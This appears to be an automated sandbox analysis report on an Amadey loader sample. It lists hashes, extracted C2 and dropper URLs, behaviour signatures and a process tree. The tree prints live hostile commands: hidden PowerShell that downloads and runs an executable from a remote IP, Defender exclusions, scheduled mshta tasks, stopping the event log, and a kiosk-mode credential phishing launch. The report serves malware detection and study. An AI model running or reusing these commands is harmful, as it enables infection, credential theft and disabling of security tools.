Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 19:48

General

  • Target

    899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe

  • Size

    1.8MB

  • MD5

    6b38db8d1cadb7a58f0bd9f9d281646a

  • SHA1

    f56be70672c257dc68cfb0b9a0781569070b122b

  • SHA256

    899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1

  • SHA512

    6ac8fbbd65da962674112f1ec89fe62c9ceb470e9c6fb7fdd9f1654d8f501b71bc6409fd08b43d8f38d2229ce1964bcbc14ae7ccbad0613a51943d9631fe20ca

  • SSDEEP

    49152:DerWqI+PXK2ZRVtlhQXXPjeDXDrC7bbnh:DeCqXa2ZRVJo2X3C7bbh

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 20 IoCs
  • Stops running service(s) 4 TTPs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 9 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of FindShellTrayWindow 18 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
    "C:\Users\Admin\AppData\Local\Temp\899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2412
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
        "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2900
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\CMnYnzVl\Anubis.exe""
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1628
      • C:\Users\Admin\AppData\Local\Temp\10105750101\7c581e7a04.exe
        "C:\Users\Admin\AppData\Local\Temp\10105750101\7c581e7a04.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn vkkiemaJdog /tr "mshta C:\Users\Admin\AppData\Local\Temp\ta6OjYcFr.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2892
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn vkkiemaJdog /tr "mshta C:\Users\Admin\AppData\Local\Temp\ta6OjYcFr.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2972
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\ta6OjYcFr.hta
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2988
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:772
            • C:\Users\Admin\AppData\Local\TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE
              "C:\Users\Admin\AppData\Local\TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:1568
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10105760121\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:2520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2296
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2420
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1984
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1356
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1928
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "vF9OEmas82S" /tr "mshta \"C:\Temp\OjPpbvgIz.hta\"" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2464
        • C:\Windows\SysWOW64\mshta.exe
          mshta "C:\Temp\OjPpbvgIz.hta"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:1188
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:992
            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2880
      • C:\Users\Admin\AppData\Local\Temp\10106150101\20b1824b6e.exe
        "C:\Users\Admin\AppData\Local\Temp\10106150101\20b1824b6e.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2788
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • Downloads MZ/PE file
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2508
      • C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe
        "C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:3040
        • C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe
          "C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"
          4⤵
          • Executes dropped EXE
          PID:636
        • C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe
          "C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"
          4⤵
          • Executes dropped EXE
          PID:1912
        • C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe
          "C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:296
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 1008
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:628
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 524
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2368
      • C:\Users\Admin\AppData\Local\Temp\10106170101\099b641ade.exe
        "C:\Users\Admin\AppData\Local\Temp\10106170101\099b641ade.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2460
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • Downloads MZ/PE file
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:772
      • C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe
        "C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1672
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 640
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:5076
      • C:\Users\Admin\AppData\Local\Temp\10106200101\ae09e8f5c6.exe
        "C:\Users\Admin\AppData\Local\Temp\10106200101\ae09e8f5c6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:1184
      • C:\Users\Admin\AppData\Local\Temp\10106210101\696151d304.exe
        "C:\Users\Admin\AppData\Local\Temp\10106210101\696151d304.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3456
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 1204
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:3920
      • C:\Users\Admin\AppData\Local\Temp\10106220101\784126e897.exe
        "C:\Users\Admin\AppData\Local\Temp\10106220101\784126e897.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:908
      • C:\Users\Admin\AppData\Local\Temp\10106230101\1566acddfa.exe
        "C:\Users\Admin\AppData\Local\Temp\10106230101\1566acddfa.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4848
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4888
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5032
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3512
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2948
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
            PID:2392
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
              5⤵
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:868
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.0.275209716\2020563201" -parentBuildID 20221007134813 -prefsHandle 1184 -prefMapHandle 1176 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {797fef6b-1fce-4509-bb02-eab778f2dbf2} 868 "\\.\pipe\gecko-crash-server-pipe.868" 1264 110d5558 gpu
                6⤵
                  PID:2748
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.1.1947579482\68757425" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8025ec50-71f8-4902-884d-0608383b8cee} 868 "\\.\pipe\gecko-crash-server-pipe.868" 1496 102fa458 socket
                  6⤵
                    PID:3152
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.2.2098601060\1785183293" -childID 1 -isForBrowser -prefsHandle 2180 -prefMapHandle 2060 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b067d7c3-ec68-4501-8380-304e0f01275e} 868 "\\.\pipe\gecko-crash-server-pipe.868" 1896 1a2bf558 tab
                    6⤵
                      PID:3724
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.3.112411928\670127742" -childID 2 -isForBrowser -prefsHandle 2740 -prefMapHandle 2736 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a933d1b2-59b6-40da-950b-8eac12096cee} 868 "\\.\pipe\gecko-crash-server-pipe.868" 2752 f63c58 tab
                      6⤵
                        PID:2796
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.4.1500940490\1547223835" -childID 3 -isForBrowser -prefsHandle 3916 -prefMapHandle 3852 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc448eea-738b-4fd8-842d-32d2d5dcb44c} 868 "\\.\pipe\gecko-crash-server-pipe.868" 3904 1a235f58 tab
                        6⤵
                          PID:2196
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.5.398400492\2143024119" -childID 4 -isForBrowser -prefsHandle 4040 -prefMapHandle 4044 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {49538a8c-0147-42c7-928d-cae11e25742d} 868 "\\.\pipe\gecko-crash-server-pipe.868" 4032 2109e758 tab
                          6⤵
                            PID:880
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.6.1984653541\1144401166" -childID 5 -isForBrowser -prefsHandle 4152 -prefMapHandle 4156 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c66806cf-80f3-49d7-8c76-40b0b81ac6a1} 868 "\\.\pipe\gecko-crash-server-pipe.868" 4144 2109f958 tab
                            6⤵
                              PID:2556
                      • C:\Users\Admin\AppData\Local\Temp\10106240101\f8860f532a.exe
                        "C:\Users\Admin\AppData\Local\Temp\10106240101\f8860f532a.exe"
                        3⤵
                        • Modifies Windows Defender DisableAntiSpyware settings
                        • Modifies Windows Defender Real-time Protection settings
                        • Modifies Windows Defender TamperProtection settings
                        • Modifies Windows Defender notification settings
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Windows security modification
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:920
                      • C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe
                        "C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4048
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 640
                          4⤵
                          • Loads dropped DLL
                          • Program crash
                          PID:6708
                      • C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe
                        "C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:6812
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 1200
                          4⤵
                          • Loads dropped DLL
                          • Program crash
                          PID:6984
                      • C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe
                        "C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe"
                        3⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        PID:7148
                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4888
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                          4⤵
                            PID:3608
                            • C:\Windows\system32\wusa.exe
                              wusa /uninstall /kb:890830 /quiet /norestart
                              5⤵
                              • Drops file in Windows directory
                              PID:4400
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            4⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3220
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                            4⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3660
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                            4⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3872
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                            4⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3916
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe delete "DWENDQPG"
                            4⤵
                            • Launches sc.exe
                            PID:4284
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"
                            4⤵
                            • Launches sc.exe
                            PID:4440
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop eventlog
                            4⤵
                            • Launches sc.exe
                            PID:4572
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe start "DWENDQPG"
                            4⤵
                            • Launches sc.exe
                            PID:4588
                        • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
                          "C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:4312
                          • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
                            "C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"
                            4⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:4364
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 1020
                              5⤵
                              • Program crash
                              PID:1864
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 504
                            4⤵
                            • Loads dropped DLL
